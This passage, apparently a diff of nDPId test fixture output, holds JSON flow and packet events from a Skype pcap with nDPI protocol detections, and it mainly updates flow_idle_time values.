-00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1252,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":3,"flow_last_seen":1431970684268,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970684268,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGx+Rv3UowwKgBIpxIyE81se9IYPNDQ6ASOJCdPQAAAgQFrAQCCApNifogPjJCqwEDAwk="} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1260,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970684583,"flow_last_seen":1431970684583,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970684583,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":51280,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1260,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":1,"flow_last_seen":1431970684583,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970684583,"pkt":"0NQSxnP1PBXCt3IOCABFAABAJbZAAEAGym3AqAEinTfrkshQAbtIMwlhAAAAALAC\/\/9JqAAAAgQFtAEDAwUBAQgKPjJI7gAAAAAEAgAA"} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1261,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970684583,"flow_last_seen":1431970684583,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970684583,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":51281,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1261,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":1,"flow_last_seen":1431970684583,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970684583,"pkt":"0NQSxnP1PBXCt3IOCABFAABATSFAAEAGovjAqAEinTfrnMhRAbsdDADVAAAAALAC\/\/99UAAAAgQFtAEDAwUBAQgKPjJI7gAAAAAEAgAA"} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1262,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970684583,"flow_last_seen":1431970684583,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970684583,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":51282,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1262,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":1,"flow_last_seen":1431970684583,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970684583,"pkt":"0NQSxnP1PBXCt3IOCABFAABA0\/xAAEAGTU7AqAEiQAQXn8hSAbvNFjtFAAAAALAC\/\/\/EBQAAAgQFtAEDAwUBAQgKPjJI7gAAAAAEAgAA"} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1263,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970684583,"flow_last_seen":1431970684583,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970684583,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":51283,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1263,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":1,"flow_last_seen":1431970684583,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970684583,"pkt":"0NQSxnP1PBXCt3IOCABFAABAs0xAAEAGC5TAqAEib91KMMhTAbtJAhNrAAAAALAC\/\/8NiQAAAgQFtAEDAwUBAQgKPjJI7gAAAAAEAgAA"} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1264,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":2,"flow_last_seen":1431970684658,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970684658,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+iedN+uSwKgBIgG7yFDrM+1YSDMJYqASOJAcRAAAAgQFrAQCCApMYODePjJI7gEDAwk="} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1265,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":2,"flow_last_seen":1431970684658,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970684658,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+h2dN+ucwKgBIgG7yFE1cNv2HQwA1qASOJASpwAAAgQFrAQCCApMXOVNPjJI7gEDAwk="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1266,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":3,"flow_last_seen":1431970684658,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970684658,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0Kw9AAEAGxSDAqAEinTfrkshQAbtIMwli6zPtWYAQECxzIwAAAQEICj4ySTlMYODe"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1267,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":3,"flow_last_seen":1431970684658,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970684658,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0tXdAAEAGOq7AqAEinTfrnMhRAbsdDADWNXDb94AQECxphgAAAQEICj4ySTlMXOVN"} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1274,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":2,"flow_last_seen":1431970684778,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970684778,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGK09ABBefwKgBIgG7yFJrWCY7zRY7RqASOJDkfAAAAgQFrAQCCApMR9oVPjJI7gEDAwk="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1275,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":3,"flow_last_seen":1431970684778,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970684778,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0bUpAAEAGtAzAqAEiQAQXn8hSAbvNFjtGa1gmPIAQECw65QAAAQEICj4ySbBMR9oV"} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1279,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":2,"flow_last_seen":1431970684880,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970684880,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGx+Rv3UowwKgBIgG7yFO6F0g1SQITbKASOJCbYQAAAgQFrAQCCApNifq4PjJI7gEDAwk="} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1280,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":3,"flow_last_seen":1431970684880,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431970684880,"pkt":"0NQSxnP1PBXCt3IOCABFAAAo55hAAEAG11\/AqAEib91KMMhTAbtJAhNsAAAAAFAEAAANjAAA"} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1252,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":3,"flow_last_seen":1431970684268,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970684268,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGx+Rv3UowwKgBIpxIyE81se9IYPNDQ6ASOJCdPQAAAgQFrAQCCApNifogPjJCqwEDAwk="} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1260,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970684583,"flow_last_seen":1431970684583,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970684583,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":51280,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1260,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":1,"flow_last_seen":1431970684583,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970684583,"pkt":"0NQSxnP1PBXCt3IOCABFAABAJbZAAEAGym3AqAEinTfrkshQAbtIMwlhAAAAALAC\/\/9JqAAAAgQFtAEDAwUBAQgKPjJI7gAAAAAEAgAA"} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1261,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970684583,"flow_last_seen":1431970684583,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970684583,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":51281,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1261,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":1,"flow_last_seen":1431970684583,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970684583,"pkt":"0NQSxnP1PBXCt3IOCABFAABATSFAAEAGovjAqAEinTfrnMhRAbsdDADVAAAAALAC\/\/99UAAAAgQFtAEDAwUBAQgKPjJI7gAAAAAEAgAA"} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1262,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970684583,"flow_last_seen":1431970684583,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970684583,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":51282,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1262,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":1,"flow_last_seen":1431970684583,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970684583,"pkt":"0NQSxnP1PBXCt3IOCABFAABA0\/xAAEAGTU7AqAEiQAQXn8hSAbvNFjtFAAAAALAC\/\/\/EBQAAAgQFtAEDAwUBAQgKPjJI7gAAAAAEAgAA"} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1263,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970684583,"flow_last_seen":1431970684583,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970684583,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":51283,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1263,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":1,"flow_last_seen":1431970684583,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970684583,"pkt":"0NQSxnP1PBXCt3IOCABFAABAs0xAAEAGC5TAqAEib91KMMhTAbtJAhNrAAAAALAC\/\/8NiQAAAgQFtAEDAwUBAQgKPjJI7gAAAAAEAgAA"} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1264,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":2,"flow_last_seen":1431970684658,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970684658,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+iedN+uSwKgBIgG7yFDrM+1YSDMJYqASOJAcRAAAAgQFrAQCCApMYODePjJI7gEDAwk="} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1265,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":2,"flow_last_seen":1431970684658,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970684658,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+h2dN+ucwKgBIgG7yFE1cNv2HQwA1qASOJASpwAAAgQFrAQCCApMXOVNPjJI7gEDAwk="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1266,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":3,"flow_last_seen":1431970684658,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970684658,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0Kw9AAEAGxSDAqAEinTfrkshQAbtIMwli6zPtWYAQECxzIwAAAQEICj4ySTlMYODe"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1267,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":3,"flow_last_seen":1431970684658,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970684658,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0tXdAAEAGOq7AqAEinTfrnMhRAbsdDADWNXDb94AQECxphgAAAQEICj4ySTlMXOVN"} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1274,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":2,"flow_last_seen":1431970684778,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970684778,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGK09ABBefwKgBIgG7yFJrWCY7zRY7RqASOJDkfAAAAgQFrAQCCApMR9oVPjJI7gEDAwk="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1275,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":3,"flow_last_seen":1431970684778,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970684778,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0bUpAAEAGtAzAqAEiQAQXn8hSAbvNFjtGa1gmPIAQECw65QAAAQEICj4ySbBMR9oV"} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1279,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":2,"flow_last_seen":1431970684880,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970684880,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGx+Rv3UowwKgBIgG7yFO6F0g1SQITbKASOJCbYQAAAgQFrAQCCApNifq4PjJI7gEDAwk="} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1280,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":3,"flow_last_seen":1431970684880,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431970684880,"pkt":"0NQSxnP1PBXCt3IOCABFAAAo55hAAEAG11\/AqAEib91KMMhTAbtJAhNsAAAAAFAEAAANjAAA"} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1286,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970684997,"flow_last_seen":1431970684997,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970684997,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.157","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1286,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":1,"flow_last_seen":1431970684997,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431970684997,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyBX4AAEARk57AqAEinTeCnTLdnE0AHhvPe8cCM2e01AKVV7JkJRCi7OoE7P+SqQ=="} 00668{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1286,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970684997,"flow_last_seen":1431970684997,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970684997,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.157","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -786,23 +786,23 @@ 00559{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1321,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970685839,"flow_last_seen":1431970685839,"flow_idle_time":120000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431970685839,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1321,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":1,"flow_last_seen":1431970685839,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1431970685839,"pkt":"PBXCt3IO0NQSxnP1CABFwABElr0AAEABX8jAqAEBwKgBIgMDgJYAAAAARQAAKO0OAABAEQpDwKgBIsCoAQHmrBTnABQM8wABAAAy3TLdAAAOEA=="} 00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1321,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970685839,"flow_last_seen":1431970685839,"flow_idle_time":120000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431970685839,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":3.991447} -00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1323,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970685852,"flow_last_seen":1431970685852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970685852,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51284,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1323,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":1,"flow_last_seen":1431970685852,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970685852,"pkt":"0NQSxnP1PBXCt3IOCABFAABAXIlAAEAG5ijAqAEiW77afchUMD4lFgKCAAAAALAC\/\/+SwgAAAgQFtAEDAwUBAQgKPjJN1wAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1324,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":2,"flow_last_seen":1431970685921,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970685921,"pkt":"PBXCt3IO0NQSxnP1CABFAAA0NCRAAPQGWplbvtp9wKgBIjA+yFR61rIKJRYCg4ASH\/4KBwAAAgQFoAEDAwQBAQQC"} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1325,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":3,"flow_last_seen":1431970685921,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431970685921,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoGAJAAEAGKsjAqAEiW77afchUMD4lFgKDetayC1AQIABKwAAA"} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1323,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970685852,"flow_last_seen":1431970685852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970685852,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51284,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1323,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":1,"flow_last_seen":1431970685852,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970685852,"pkt":"0NQSxnP1PBXCt3IOCABFAABAXIlAAEAG5ijAqAEiW77afchUMD4lFgKCAAAAALAC\/\/+SwgAAAgQFtAEDAwUBAQgKPjJN1wAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1324,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":2,"flow_last_seen":1431970685921,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970685921,"pkt":"PBXCt3IO0NQSxnP1CABFAAA0NCRAAPQGWplbvtp9wKgBIjA+yFR61rIKJRYCg4ASH\/4KBwAAAgQFoAEDAwQBAQQC"} 